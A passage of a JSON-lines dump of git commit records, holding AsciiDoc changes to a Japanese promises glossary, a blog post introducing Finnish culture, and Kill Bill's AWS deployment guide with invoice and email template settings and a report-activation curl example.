promise\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u306e\u8868\u793a\u3092\u4fee\u6b63\n","repos":"cqricky\/promises-book,lidasong2014\/promises-book,tangjinzhou\/promises-book,liubin\/promises-book,azu\/promises-book,liyunsheng\/promises-book,purepennons\/promises-book,tangjinzhou\/promises-book,azu\/promises-book,wangwei1237\/promises-book,wangwei1237\/promises-book,cqricky\/promises-book,azu\/promises-book,lidasong2014\/promises-book,mzbac\/promises-book,liyunsheng\/promises-book,lidasong2014\/promises-book,mzbac\/promises-book,dieface\/promises-book,sunfurong\/promise,liubin\/promises-book,cqricky\/promises-book,wenber\/promises-book,sunfurong\/promise,purepennons\/promises-book,wenber\/promises-book,charlenopires\/promises-book,mzbac\/promises-book,dieface\/promises-book,sunfurong\/promise,oToUC\/promises-book,genie88\/promises-book,genie88\/promises-book,genie88\/promises-book,azu\/promises-book,xifeiwu\/promises-book,xifeiwu\/promises-book,liyunsheng\/promises-book,charlenopires\/promises-book,dieface\/promises-book,purepennons\/promises-book,xifeiwu\/promises-book,oToUC\/promises-book,wangwei1237\/promises-book,wenber\/promises-book,oToUC\/promises-book,liubin\/promises-book,tangjinzhou\/promises-book,charlenopires\/promises-book","old_file":"Appendix-Glossary\/readme.adoc","new_file":"Appendix-Glossary\/readme.adoc","new_contents":"[[promise-glossary]]\n= \u7528\u8a9e\u96c6\n\nPromises::\n \u30d7\u30ed\u30df\u30b9\u3068\u3044\u3046\u4ed5\u69d8\u305d\u306e\u3082\u306e\npromise\u30aa\u30d6\u30b8\u30a7\u30af\u30c8::\n \u30d7\u30ed\u30df\u30b9\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u3001`Promise`\u306e\u30a4\u30f3\u30b9\u30bf\u30f3\u30b9\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u306e\u4e8b\n[[es6-promises]]\nES6 Promises::\n http:\/\/people.mozilla.org\/%7Ejorendorff\/es6-draft.html#sec-operations-on-promise-objects[ECMAScript 6th Edition] \u3092\u660e\u793a\u7684\u306b\u793a\u3059\u5834\u5408\u306bprefix\u3068\u3057\u3066 _ES6_ \u3092\u3064\u3051\u308b\n[[promises-aplus]]\nPromises\/A+::\n http:\/\/promises-aplus.github.io\/promises-spec\/[Promises\/A+]\u306e\u4e8b\u3002\n ES6 Promises\u306e\u524d\u8eab\u3068\u306a\u3063\u305f\u30b3\u30df\u30e5\u30cb\u30c6\u30a3\u30d9\u30fc\u30b9\u306e\u4ed5\u69d8\u3067\u3042\u308a\u3001ES6 Promises\u3068\u306f\u591a\u304f\u306e\u90e8\u5206\u304c\u5171\u901a\u3057\u3066\u3044\u308b\u3002\n[[Thenable]]\nThenable::\n Promise\u30e9\u30a4\u30af\u306a\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u306e\u4e8b\u3002\n `.then`\u3068\u3044\u3046\u30e1\u30bd\u30c3\u30c9\u3092\u6301\u3064\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u3002\n[[promise-chain]]\npromise chain::\n promise\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u3092`then`\u3084`catch`\u306e\u30e1\u30bd\u30c3\u30c9\u30c1\u30a7\u30fc\u30f3\u3067\u3064\u306a\u3052\u305f\u3082\u306e\u3002\n \u3053\u306e\u7528\u8a9e\u306f\u66f8\u7c4d\u4e2d\u306e\u3082\u306e\u3067\u3042\u308a\u3001<<es6-promises,ES6 Promises>>\u3067\u5b9a\u3081\u3089\u308c\u305f\u7528\u8a9e\u3067\u306f\u3042\u308a\u307e\u305b\u3093\u3002","old_contents":"[[promise-glossary]]\n= \u7528\u8a9e\u96c6\n\nPromises::\n \u30d7\u30ed\u30df\u30b9\u3068\u3044\u3046\u4ed5\u69d8\u305d\u306e\u3082\u306e\nPromise::\n \u30d7\u30ed\u30df\u30b9\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u3001\u30a4\u30f3\u30b9\u30bf\u30f3\u30b9\n[[es6-promises]]\nES6 Promises::\n http:\/\/people.mozilla.org\/%7Ejorendorff\/es6-draft.html#sec-operations-on-promise-objects[ECMAScript 6th Edition] \u3092\u660e\u793a\u7684\u306b\u793a\u3059\u5834\u5408\u306bprefix\u3068\u3057\u3066 _ES6_ \u3092\u3064\u3051\u308b\n[[promises-aplus]]\nPromises\/A+::\n http:\/\/promises-aplus.github.io\/promises-spec\/[Promises\/A+]\u306e\u4e8b\u3002\n ES6 Promises\u306e\u30d9\u30fc\u30b9\u3068\u306a\u3063\u305f\u30b3\u30df\u30e5\u30cb\u30c6\u30a3\u30d9\u30fc\u30b9\u306e\u4ed5\u69d8\u3067\u3042\u308a\u3001ES6 Promises\u3068\u306f\u591a\u304f\u306e\u90e8\u5206\u304c\u5171\u901a\u3057\u3066\u3044\u308b\u3002\n[[Thenable]]\nThenable::\n Promise\u30e9\u30a4\u30af\u306a\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u306e\u4e8b\u3002\n `.then`\u3068\u3044\u3046\u30e1\u30bd\u30c3\u30c9\u3092\u6301\u3064\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u3002\n[[promise-chain]]\npromise chain::\n promise\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u3092`then`\u3084`catch`\u306e\u30e1\u30bd\u30c3\u30c9\u30c1\u30a7\u30fc\u30f3\u3067\u3064\u306a\u3052\u305f\u3082\u306e\u3002\n \u3053\u306e\u7528\u8a9e\u306f\u66f8\u7c4d\u4e2d\u306e\u3082\u306e\u3067\u3042\u308a\u3001<<es6-promises,ES6 Promises>>\u3067\u5b9a\u3081\u3089\u308c\u305f\u7528\u8a9e\u3067\u306f\u3042\u308a\u307e\u305b\u3093\u3002","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"9093a1cb22e49337d05585c145e9b29b322e7a24","subject":"Update 2015-09-08-Finnish-Culture-101.adoc","message":"Update 2015-09-08-Finnish-Culture-101.adoc","repos":"TeksInHelsinki\/en,TeksInHelsinki\/en,TeksInHelsinki\/en","old_file":"_posts\/2015-09-08-Finnish-Culture-101.adoc","new_file":"_posts\/2015-09-08-Finnish-Culture-101.adoc","new_contents":"= Finnish Culture 101\n:hp-tags: Culture, sisu, sauna, nature, Kalevala\n:hp-image: https:\/\/TeksInHelsinki.github.com\/images\/article_covers\/4.bases_culture.jpg\n:published_at: 2015-09-08\n\nThis post aims at enlightning you on some of the main aspects of Finnish culture!\n\n=== Sisu\n\n\"Sisu\" is the Finnish mindset. Basically, sisu means determination, bravery, guts, resilience & perseverance. +\nIt is sisu that allows Finnish people to go through long winters without complaining, and which gave them the reputation of being at their best when the circumstances are at their worst. +\nAccording to the French Wikipedia, \"The sisu is the heart of the Finnish soul. It is the patient stubbornness which allows the Finnish people to face all the situations and to complete their goals\".\n\n=== Sauna\n\nSaunas are EVERYWHERE in Finland! Most flats and houses have one (usually connected to their bathrooms), except for some small student flats, in which case there's probably a common sauna in the building anyway. There's about 3 million saunas in Finland, for 5 million inhabitants, which means that the whole population of Finland could be sitting inside a sauna at the same time!\n\nSaunas in Finland are really hot, and can be a bit hardcore to get used to. But when you'll go back to your country, you'll find all the public saunas way too cold :) Finnish saunas are usually between 60\u00b0C and 80\u00b0C (140\u00b0F and 175\u00b0F), I think. +\nI once made the mistake of telling a Finnish person I thought his sauna was not hot enough. On the next day he heated it up so much I couldn't even sit on the burning wood benches.\n\nSometimes, birch branches (named vihta) are used to whip people in the sauna, in order to make their blood circulate better. People can also jump in snow or swim in a frozen lake in the middle of winter. Whatever floats your boat, right? +\n\nSauna is very healthy for numerous reasons: it helps remove nicotine from one's blood if they want to stop smoking, it kills lice and bedbugs, it stimulates blood circulation and the immune system, and tons of other cool stuff! \n\nOne last thing: you have to be naked in saunas. Yup. Swimsuits are mostly forbidden, and towels around your hips can seem weird as you're gonna be the only one wearing them. Because of this, most of public saunas are not gender neutral, although it's quite common to have mixed saunas with friends and family.\n\nlink:http:\/\/satwcomic.com\/sauna-time[A little comic to give you a better idea of sauna]\n\n=== Nature\n\nFinns, more than most western peoples, are extremely close to nature... and you can see proofs of this everywhere! There's a lot of nature in towns (trees, parks, undisturbed wild areas etc.), the Finnish design is often inspired by nature (cf. Alvar Aalto), and they are very conscious about environnement issues.\n\nThis love of nature is well represented by the national anthem, \"Maamme\" (Our Land), which is, unlike most national anthems, a war chant. Indeed, it only deals with hoz beautiful Finland's nature is! +\nThe Finnish flag also reflects this: the white represents the snow, and the blue represents the lakes.\n\nLast but not least, _jokamiehenoikeus_ is a Finnish word representing the rule that you can enjoy the nature, as long as you respect it, while ignoring the concepts of ownership. It means that you can go in privately owned lands, as long as you don't bother the landlords - more precisely, as long as you don't hear each other. This is one of the reasons why camping is authorized everywhere in Finland.\n\n\n=== Le Kalevala\n\nThe Kalevala is the national epic of Finland, so it deals with Finnish mythology. Finland is _not_ part of Scandinavia, hence its people never worshipped Thor, Odin, Loki & co.\n\nThe Kalevala was written in the 19th century by Elias L\u00f6nnrot, who travelled throughout Finland to acquire traditional songs from bards, before ordering them so that they form a logical(ish) story. +\nFor instance, the creation of the world, according to Finnish mythology, went as follows: a woman (Ilmatar, the air's daughter) is in the sea, a duck rests on her knee to lay its eggs but she accidentaly breaks them and a part of the shell becomes the earth, the other becomes the sky, the yolk becomes the sun and the white is the moon. Why not, eh? +\nThat's only a part of the first \"song\" of the Kalevala, out of 50 in total. The others are epic stories about various characters, including a**holes harassing girls so much that they kill themselves (ever heard of V\u00e4in\u00e4m\u00f6inen?), sorcerers and healers, badass smiths (Ilmarinen FTW!) etc.\n\nThe Kalevala is very present in Finnish culture, even though now most people don't believe in the old gods anymore. You can see painting of V\u00e4i\u00e4m\u00f6inen's adventures in museums, and he is also on Finnish memes - I'll put some in my articles later. +\nThe book also greatly inspired Tolkien when he wrote The Lord of the Ring, just as the Finnish language inspired him to create the Elvish one.\n\nIf you like to read epic adventures and fantasy, you should definitely read this book! I'm reading the French translation, which is very good, but I don't know about the other translations. It is surprisingly easy to read, and the stories are captivating!\n\nNOTE: Article written by link:https:\/\/github.com\/Lokenstein[Coline]\n\nNOTE: Sources : my memories from Finland, the Kalevala, the French and English Wikipedia pages of Sisu, and the Internet ","old_contents":"= Finnish Culture 101\n:hp-tags: Culture, sisu, sauna, nature, Kalevala\n:hp-image: https:\/\/TeksInHelsinki.github.com\/images\/article_covers\/4.bases_culture.jpg\n:published_at: 2015-03-05\n\nThis post aims at enlightning you on some of the main aspects of Finnish culture!\n\n=== Sisu\n\n\"Sisu\" is the Finnish mindset. Basically, sisu means determination, bravery, guts, resilience & perseverance. +\nIt is sisu that allows Finnish people to go through long winters without complaining, and which gave them the reputation of being at their best when the circumstances are at their worst. +\nAccording to the French Wikipedia, \"The sisu is the heart of the Finnish soul. It is the patient stubbornness which allows the Finnish people to face all the situations and to complete their goals\".\n\n=== Sauna\n\nSaunas are EVERYWHERE in Finland! Most flats and houses have one (usually connected to their bathrooms), except for some small student flats, in which case there's probably a common sauna in the building anyway. There's about 3 million saunas in Finland, for 5 million inhabitants, which means that the whole population of Finland could be sitting inside a sauna at the same time!\n\nSaunas in Finland are really hot, and can be a bit hardcore to get used to. But when you'll go back to your country, you'll find all the public saunas way too cold :) Finnish saunas are usually between 60\u00b0C and 80\u00b0C (140\u00b0F and 175\u00b0F), I think. +\nI once made the mistake of telling a Finnish person I thought his sauna was not hot enough. On the next day he heated it up so much I couldn't even sit on the burning wood benches.\n\nSometimes, birch branches (named vihta) are used to whip people in the sauna, in order to make their blood circulate better. People can also jump in snow or swim in a frozen lake in the middle of winter. Whatever floats your boat, right? +\n\nSauna is very healthy for numerous reasons: it helps remove nicotine from one's blood if they want to stop smoking, it kills lice and bedbugs, it stimulates blood circulation and the immune system, and tons of other cool stuff! \n\nOne last thing: you have to be naked in saunas. Yup. Swimsuits are mostly forbidden, and towels around your hips can seem weird as you're gonna be the only one wearing them. Because of this, most of public saunas are not gender neutral, although it's quite common to have mixed saunas with friends and family.\n\nlink:http:\/\/satwcomic.com\/sauna-time[A little comic to give you a better idea of sauna]\n\n=== Nature\n\nFinns, more than most western peoples, are extremely close to nature... and you can see proofs of this everywhere! There's a lot of nature in towns (trees, parks, undisturbed wild areas etc.), the Finnish design is often inspired by nature (cf. Alvar Aalto), and they are very conscious about environnement issues.\n\nThis love of nature is well represented by the national anthem, \"Maamme\" (Our Land), which is, unlike most national anthems, a war chant. Indeed, it only deals with hoz beautiful Finland's nature is! +\nThe Finnish flag also reflects this: the white represents the snow, and the blue represents the lakes.\n\nLast but not least, _jokamiehenoikeus_ is a Finnish word representing the rule that you can enjoy the nature, as long as you respect it, while ignoring the concepts of ownership. It means that you can go in privately owned lands, as long as you don't bother the landlords - more precisely, as long as you don't hear each other. This is one of the reasons why camping is authorized everywhere in Finland.\n\n\n=== Le Kalevala\n\nThe Kalevala is the national epic of Finland, so it deals with Finnish mythology. Finland is _not_ part of Scandinavia, hence its people never worshipped Thor, Odin, Loki & co.\n\nThe Kalevala was written in the 19th century by Elias L\u00f6nnrot, who travelled throughout Finland to acquire traditional songs from bards, before ordering them so that they form a logical(ish) story. +\nFor instance, the creation of the world, according to Finnish mythology, went as follows: a woman (Ilmatar, the air's daughter) is in the sea, a duck rests on her knee to lay its eggs but she accidentaly breaks them and a part of the shell becomes the earth, the other becomes the sky, the yolk becomes the sun and the white is the moon. Why not, eh? +\nThat's only a part of the first \"song\" of the Kalevala, out of 50 in total. The others are epic stories about various characters, including a**holes harassing girls so much that they kill themselves (ever heard of V\u00e4in\u00e4m\u00f6inen?), sorcerers and healers, badass smiths (Ilmarinen FTW!) etc.\n\nThe Kalevala is very present in Finnish culture, even though now most people don't believe in the old gods anymore. You can see painting of V\u00e4i\u00e4m\u00f6inen's adventures in museums, and he is also on Finnish memes - I'll put some in my articles later. +\nThe book also greatly inspired Tolkien when he wrote The Lord of the Ring, just as the Finnish language inspired him to create the Elvish one.\n\nIf you like to read epic adventures and fantasy, you should definitely read this book! I'm reading the French translation, which is very good, but I don't know about the other translations. It is surprisingly easy to read, and the stories are captivating!\n\nNOTE: Article written by link:https:\/\/github.com\/Lokenstein[Coline]\n\nNOTE: Sources : my memories from Finland, the Kalevala, the French and English Wikipedia pages of Sisu, and the Internet ","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"aea7f0e9755ca8a1c4958b194215e65aaca0f5d6","subject":"aws: updates","message":"aws: updates\n\nSigned-off-by: Pierre-Alexandre Meyer <ff019a5748a52b5641624af88a54a2f0e46a9fb5@mouraf.org>\n","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/aws.adoc","new_file":"userguide\/tutorials\/aws.adoc","new_contents":"= Kill Bill on AWS\n\n++++\n<div class=\"col-sm-8\" style=\"max-width: 100%\">\n <div id=\"cards\" class=\"card text-center\">\n <div class=\"card-group\">\n <div class=\"card\">\n <div class=\"card-body\">\n <h5 class=\"card-title\">Single-Tier single AMI with MariaDB<\/h5>\n <p class=\"card-text\">Perfect for prototyping and test environments<\/p>\n <a href=\"https:\/\/aws.amazon.com\/marketplace\/pp\/B083LYVG9H?ref=_ptnr_doclanding_\" onclick=\"getOutboundLink('https:\/\/aws.amazon.com\/marketplace\/pp\/B083LYVG9H?ref=_ptnr_doclanding_'); return false;\" class=\"btn btn-primary\">Launch<\/a>\n <\/div>\n <\/div>\n <div class=\"card\">\n <div class=\"card-body\">\n <h5 class=\"card-title\">Multi-Tier CloudFormation with Amazon Aurora<\/h5>\n <p class=\"card-text\">Production ready setup in minutes <strong>(most popular)<\/strong><\/p>\n <a href=\"https:\/\/aws.amazon.com\/marketplace\/pp\/prodview-nochv5omslmds?ref=_ptnr_doc_\" onclick=\"getOutboundLink('https:\/\/aws.amazon.com\/marketplace\/pp\/prodview-nochv5omslmds?ref=_ptnr_doclanding_'); return false;\" class=\"btn btn-primary\">Launch<\/a>\n <\/div>\n <\/div>\n <div class=\"card\">\n <div class=\"card-body\">\n <h5 class=\"card-title\">Multi-Tier single AMI with external database<\/h5>\n <p class=\"card-text\">Fully customizable production environment (advanced users)<\/p>\n <a href=\"https:\/\/aws.amazon.com\/marketplace\/pp\/B083LYVG9H?ref=_ptnr_doclanding_\" onclick=\"getOutboundLink('https:\/\/aws.amazon.com\/marketplace\/pp\/B083LYVG9H?ref=_ptnr_doclanding_'); return false;\" class=\"btn btn-primary\">Launch<\/a>\n <\/div>\n <\/div>\n <\/div>\n <\/div>\n<\/div>\n++++\n\n++++\n<p>\n <span class=\"badge badge-primary\">New!<\/span> AWS deployments now come with free initial Slack support, register <a href=\"https:\/\/killbill.io\/aws\" onclick=\"getOutboundLink('https:\/\/killbill.io\/aws'); return false;\">here<\/a>.\n<\/p>\n++++\n\n== Overview\n\nThe core development team publishes official images on the AWS Marketplace, which allow you to quickly get started with Kill Bill in the cloud. There are several strategies and AMIs to target different use cases:\n\n1. Single AMI Deployments: Both Kill Bill server and KAUI, the administrative UI, run in the same EC2 instance.\n2. Cloud Formation Deployments: The Cloud Formation Template will deploy auto-scaling groups of instances for Kill Bill server and KAUI, and create an RDS database instance. There is a separate AMI for Kill Bill server and for KAUI.\n\nSo, which one to chose?\n\n**Cloud Formation Deployments** offer a better integration with the rest of the AWS ecosystem, by relying on auto-scaling groups to scale both Kill Bill and KAUI instances independently and also by relying on CloudWatch for metrics. They also offer a **1-click** button deployment for the whole stack, incl. the required database. Cloud Formation Deployments are a good option to get a production ready deployment with minimum efforts. Please refer to the https:\/\/docs.killbill.io\/latest\/aws-cf.html[specifics of Cloud Formation Deployments].\n\n**Single AMI Deployments** come in 2 flavors:\n\n* `Single-Tier`: In order to quickly get started, we provide an AMI that can be launched with a **1-click** button. Both Kill Bill server, KAUI and the database run on **one node**, so while this is very convenient to get started, this is often a poor option for production deployments.\n* `Multi-Tier`: In this mode, there is also one single AMI for both Kill Bill server and KAUI, but the deployment will rely on an external database. Typically such deployments will also rely on at least 2 instances for running the Kill Bill stack to provide to right level of redundancy and zero downtime upgrade deployments.\n\nThe Single AMI Deployments are a great way to easily get started through the `Single-Tier` option, but they typically require a bit more setup for production deployments. Please refer to the https:\/\/docs.killbill.io\/latest\/aws-single-ami.html[specifics of the Single AMI Deployments].\n\nThe rest of this documentation focuses on configurations that apply to both types of deployments.\n\n== Default configuration\n\nEither installation method comes with a default configuration to get you started.\n\nA few plugins are also pre-configured, but not installed: all you need to do is head to the Kaui KPM page and select the plugin(s) of your choice to install.\n\n=== Invoice templates\n\nKill Bill invoices can be rendered as HTML using our https:\/\/killbill.github.io\/slate\/#invoice-render-an-invoice-as-html[render HTML invoice API]. This can be useful for instance to expose the invoices directly to your customer on the billing section of your website.\n\nThe default template looks as such:\n\nimage:https:\/\/github.com\/killbill\/killbill-docs\/raw\/v3\/userguide\/assets\/aws\/invoice_html.png[align=center]\n\nThe text can be customized and translated. To do so, create file `InvoiceTranslation_en_US.properties` with the following content (adjust the values on the right side of the `=` sign as needed):\n\n[source,properties]\n----\ncompanyName=Acme Corporation\ncompanyAddress=57 Academy Drive\ncompanyCityProvincePostalCode=Oak Creek, WI 53154\ncompanyCountry=US\ninvoiceTitle=Invoice\ninvoiceDate=Invoice Date: \ninvoiceAmount=Total: \ninvoiceAmountPaid=Amount Paid: \ninvoiceBalance=Balance: \ninvoiceItemServicePeriod=Service Period\ninvoiceItemDescription=Plan\ninvoiceItemAmount=Amount\n----\n\nand upload it to Kaui by going to your admin tenant page (`InvoiceTranslation`) tab:\n\nimage:https:\/\/github.com\/killbill\/killbill-docs\/raw\/v3\/userguide\/assets\/aws\/invoice_html_config.png[align=center]\n\nAdditional languages can be uploaded for each locale (e.g. specify `fr_FR` for French).\n\nMore details are available in our https:\/\/docs.killbill.io\/latest\/internationalization.html[Internationalization] userguide, including how to fully customize the template.\n\n=== Email notifications\n\n==== SMTP configuration\n\nThe plugin needs to be configured with an SMTP server to be able to send emails. The easiest to set it up on AWS is with https:\/\/docs.aws.amazon.com\/ses\/latest\/DeveloperGuide\/send-email-smtp.html[SES].\n\nOnce you have obtained your credentials, update the plugin configuration:\n\nimage:https:\/\/github.com\/killbill\/killbill-docs\/raw\/v3\/userguide\/assets\/aws\/email-notifications_config.png[align=center]\n\n==== Templates\n\nThe plugin comes with a preconfigured set of email templates.\n\nFor instance, this is the email which will be sent when an invoice is generated:\n\nimage:https:\/\/github.com\/killbill\/killbill-docs\/raw\/v3\/userguide\/assets\/aws\/invoice_email.png[align=center]\n\nThis is what the user will receive when a subscription is cancelled:\n\nimage:https:\/\/github.com\/killbill\/killbill-docs\/raw\/v3\/userguide\/assets\/aws\/cancellation_email.png[align=center]\n\nThe default set of translation strings are:\n\n[source,properties]\n----\nupcomingInvoiceAdditionalMessage=Here's a preview of your upcoming invoice\nupcomingInvoiceSubject=Your upcoming invoice\ninvoiceCreationAdditionalMessage=Thank you for your prompt payment!\ninvoiceCreationSubject=Your recent invoice\nsuccessfulPaymentAdditionalMessage=Thank you for your recent payment!\nsuccessfulPaymentSubject=Your recent payment\nfailedPaymentAdditionalMessage=We were not able to process your payment!\nfailedPaymentSubject=Your recent payment\npaymentRefundAdditionalMessage=Your refund has been processed!\npaymentRefundSubject=Your recent payment\ncompanyName=Acme Corporation\ncompanyAddress=57 Academy Drive\ncompanyCityProvincePostalCode=Oak Creek, WI 53154\ncompanyCountry=US\ninvoicePrefix=INV# \ninvoiceTitle=Invoice\ninvoiceDate=Invoice Date: \ninvoiceAmount=Total: \ninvoiceAmountPaid=Amount Paid: \ninvoiceBalance=Balance: \ninvoiceItemServicePeriod=Service Period\ninvoiceItemDescription=Plan\ninvoiceItemAmount=Amount\npaymentTitle=Payment\npaymentDate=Payment Date: \npaymentAmount=Total: \nsubscriptionCancellationRequestedAdditionalMessage=The following subscription will be cancelled\nsubscriptionCancellationRequestedSubject=Your subscription will be cancelled\nsubscriptionCancellationEffectiveAdditionalMessage=The following subscription has been cancelled\nsubscriptionCancellationEffectiveSubject=Your subscription has been cancelled\nsubscriptionTitle=Subscription\nsubscriptionEndDate=End Date: \nsusbscriptionPlan=Plan: \n----\n\nMore details on how to update these and update the HTML templates are available in the https:\/\/github.com\/killbill\/killbill-email-notifications-plugin[plugin] documentation.\n\n=== Analytics plugin\n\nThe plugin comes with a few pre-configured reports:\n\n* `Subscriptions creation`: count the number of subscriptions being created per day (effective on that day, i.e. pending subscriptions are ignored). Refreshed every hour. The name of the report is `report_new_subscriptions_daily`.\n* `Effective cancellations`: count the number of subscriptions being canceled per day (only effective cancellations are taken into account: end of term cancellations are ignored for instance). Refreshed every hour. The name of the report is `report_cancellations_daily`.\n* `Overdue accounts`: count the number of overdue accounts per day (defined as having a negative balance, i.e. owing money). Refreshed once a day at 6am GMT. The name of the report is `report_overdue_accounts_daily`.\n\nIn order to make these reports active, they must be enabled on a per tenant level. Assuming a `bob\/lazar` tenant, we can active the reports using the following command -- e.g. report=`report_cancellations_daily`:\n\n```\n#\n# Activate report report_cancellations_daily for tenant bob\/lazar:\n#\ncurl -v \\\n-X PUT \\\n-u admin:password \\\n-H \"X-Killbill-ApiKey:bob\" \\\n-H \"X-Killbill-ApiSecret:lazar\" \\\n-H 'Content-Type: application\/json' \\\n-d '{}' \\\n'http:\/\/127.0.0.1:8080\/plugins\/killbill-analytics\/reports\/report_cancellations_daily?shouldRefresh=true'\n```\n\nCustom reports can be added by following our https:\/\/docs.killbill.io\/latest\/userguide_analytics.html[Analytics guide].\n\nimage:https:\/\/github.com\/killbill\/killbill-docs\/raw\/v3\/userguide\/assets\/aws\/analytics_reports.png[align=center]\n","old_contents":"= Kill Bill on AWS\n\n++++\n<div class=\"col-sm-8\" style=\"max-width: 100%\">\n <div id=\"cards\" class=\"card text-center\">\n <div class=\"card-group\">\n <div class=\"card\">\n <div class=\"card-body\">\n <h5 class=\"card-title\">Single-Tier single AMI with MariaDB<\/h5>\n <p class=\"card-text\">Perfect for prototyping and test environments<\/p>\n <a href=\"https:\/\/aws.amazon.com\/marketplace\/pp\/B083LYVG9H?ref=_ptnr_doclanding_\" onclick=\"getOutboundLink('https:\/\/aws.amazon.com\/marketplace\/pp\/B083LYVG9H?ref=_ptnr_doclanding_'); return false;\" class=\"btn btn-primary\">Launch<\/a>\n <\/div>\n <\/div>\n <div class=\"card\">\n <div class=\"card-body\">\n <h5 class=\"card-title\">Multi-Tier CloudFormation with Amazon Aurora<\/h5>\n <p class=\"card-text\">Production ready setup in minutes <strong>(most popular)<\/strong><\/p>\n <a href=\"https:\/\/aws.amazon.com\/marketplace\/pp\/prodview-nochv5omslmds?ref=_ptnr_doc_\" onclick=\"getOutboundLink('https:\/\/aws.amazon.com\/marketplace\/pp\/prodview-nochv5omslmds?ref=_ptnr_doclanding_'); return false;\" class=\"btn btn-primary\">Launch<\/a>\n <\/div>\n <\/div>\n <div class=\"card\">\n <div class=\"card-body\">\n <h5 class=\"card-title\">Multi-Tier single AMI with external database<\/h5>\n <p class=\"card-text\">Fully customizable production environment (advanced users)<\/p>\n <a href=\"https:\/\/aws.amazon.com\/marketplace\/pp\/B083LYVG9H?ref=_ptnr_doclanding_\" onclick=\"getOutboundLink('https:\/\/aws.amazon.com\/marketplace\/pp\/B083LYVG9H?ref=_ptnr_doclanding_'); return false;\" class=\"btn btn-primary\">Launch<\/a>\n <\/div>\n <\/div>\n <\/div>\n <\/div>\n<\/div>\n++++\n\n== Overview\n\nThe core development team publishes official images on the AWS Marketplace, which allow you to quickly get started with Kill Bill in the cloud. There are several strategies and AMIs to target different use cases:\n\n1. Single AMI Deployments: Both Kill Bill server and KAUI, the administrative UI, run in the same EC2 instance.\n2. Cloud Formation Deployments: The Cloud Formation Template will deploy auto-scaling groups of instances for Kill Bill server and KAUI, and create an RDS database instance. There is a separate AMI for Kill Bill server and for KAUI.\n\nSo, which one to chose?\n\n**Cloud Formation Deployments** offer a better integration with the rest of the AWS ecosystem, by relying on auto-scaling groups to scale both Kill Bill and KAUI instances independently and also by relying on CloudWatch for metrics. They also offer a **1-click** button deployment for the whole stack, incl. the required database. Cloud Formation Deployments are a good option to get a production ready deployment with minimum efforts. Please refer to the https:\/\/docs.killbill.io\/latest\/aws-cf.html[specifics of Cloud Formation Deployments].\n\n**Single AMI Deployments** come in 2 flavors:\n\n* `Single-Tier`: In order to quickly get started, we provide an AMI that can be launched with a **1-click** button. Both Kill Bill server, KAUI and the database run on **one node**, so while this is very convenient to get started, this is often a poor option for production deployments.\n* `Multi-Tier`: In this mode, there is also one single AMI for both Kill Bill server and KAUI, but the deployment will rely on an external database. Typically such deployments will also rely on at least 2 instances for running the Kill Bill stack to provide to right level of redundancy and zero downtime upgrade deployments.\n\nThe Single AMI Deployments are a great way to easily get started through the `Single-Tier` option, but they typically require a bit more setup for production deployments. Please refer to the https:\/\/docs.killbill.io\/latest\/aws-single-ami.html[specifics of the Single AMI Deployments].\n\nThe rest of this documentation focuses on configurations that apply to both types of deployments.\n\n== Default configuration\n\nEither installation method comes with a default configuration to get you started.\n\nA few plugins are also pre-configured, but not installed: all you need to do is head to the Kaui KPM page and select the plugin(s) of your choice to install.\n\n=== Invoice templates\n\nKill Bill invoices can be rendered as HTML using our https:\/\/killbill.github.io\/slate\/#invoice-render-an-invoice-as-html[render HTML invoice API]. This can be useful for instance to expose the invoices directly to your customer on the billing section of your website.\n\nThe default template looks as such:\n\nimage:https:\/\/github.com\/killbill\/killbill-docs\/raw\/v3\/userguide\/assets\/aws\/invoice_html.png[align=center]\n\nThe text can be customized and translated. To do so, create file `InvoiceTranslation_en_US.properties` with the following content (adjust the values on the right side of the `=` sign as needed):\n\n[source,properties]\n----\ncompanyName=Acme Corporation\ncompanyAddress=57 Academy Drive\ncompanyCityProvincePostalCode=Oak Creek, WI 53154\ncompanyCountry=US\ninvoiceTitle=Invoice\ninvoiceDate=Invoice Date: \ninvoiceAmount=Total: \ninvoiceAmountPaid=Amount Paid: \ninvoiceBalance=Balance: \ninvoiceItemServicePeriod=Service Period\ninvoiceItemDescription=Plan\ninvoiceItemAmount=Amount\n----\n\nand upload it to Kaui by going to your admin tenant page (`InvoiceTranslation`) tab:\n\nimage:https:\/\/github.com\/killbill\/killbill-docs\/raw\/v3\/userguide\/assets\/aws\/invoice_html_config.png[align=center]\n\nAdditional languages can be uploaded for each locale (e.g. specify `fr_FR` for French).\n\nMore details are available in our https:\/\/docs.killbill.io\/latest\/internationalization.html[Internationalization] userguide, including how to fully customize the template.\n\n=== Email notifications\n\n==== SMTP configuration\n\nThe plugin needs to be configured with an SMTP server to be able to send emails. The easiest to set it up on AWS is with https:\/\/docs.aws.amazon.com\/ses\/latest\/DeveloperGuide\/send-email-smtp.html[SES].\n\nOnce you have obtained your credentials, update the plugin configuration:\n\nimage:https:\/\/github.com\/killbill\/killbill-docs\/raw\/v3\/userguide\/assets\/aws\/email-notifications_config.png[align=center]\n\n==== Templates\n\nThe plugin comes with a preconfigured set of email templates.\n\nFor instance, this is the email which will be sent when an invoice is generated:\n\nimage:https:\/\/github.com\/killbill\/killbill-docs\/raw\/v3\/userguide\/assets\/aws\/invoice_email.png[align=center]\n\nThis is what the user will receive when a subscription is cancelled:\n\nimage:https:\/\/github.com\/killbill\/killbill-docs\/raw\/v3\/userguide\/assets\/aws\/cancellation_email.png[align=center]\n\nThe default set of translation strings are:\n\n[source,properties]\n----\nupcomingInvoiceAdditionalMessage=Here's a preview of your upcoming invoice\nupcomingInvoiceSubject=Your upcoming invoice\ninvoiceCreationAdditionalMessage=Thank you for your prompt payment!\ninvoiceCreationSubject=Your recent invoice\nsuccessfulPaymentAdditionalMessage=Thank you for your recent payment!\nsuccessfulPaymentSubject=Your recent payment\nfailedPaymentAdditionalMessage=We were not able to process your 